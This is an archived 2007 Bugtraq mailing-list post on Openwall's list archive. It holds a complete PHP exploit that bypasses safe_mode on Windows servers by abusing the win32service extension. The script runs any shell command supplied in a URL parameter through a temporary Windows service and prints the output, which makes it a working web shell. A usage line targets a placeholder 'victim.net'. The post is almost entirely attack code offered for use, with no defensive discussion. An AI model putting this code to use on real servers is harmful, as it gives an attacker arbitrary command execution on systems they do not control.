lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070727130019.14947.qmail@securityfocus.com>
Date: 27 Jul 2007 13:00:19 -0000
From: nima_501@...oo.com
To: bugtraq@...urityfocus.com
Subject: PHP Safe_mode bypass exploit (win32service)

<?php

#####################################################
### PHP Safe_mode bypass exploit (win32service)   ###
###                                               ###
### Note: Tested on 5.2.1                         ###
###                                               ###
### Author:  NetJackal                            ###
### Email:   nima_501[at]yahoo[dot]com            ###
### Website: http://netjackal.by.ru               ###
###                                               ###
###                                               ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################

$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand
$dir=ini_get('upload_tmp_dir'); #Directory to store command's output

if(!extension_loaded('win32service'))die('win32service extension not found!');
$name=$dir."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec=file_get_contents($name);
unlink($name);
echo "<pre>".htmlspecialchars($exec)."</pre>";
?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ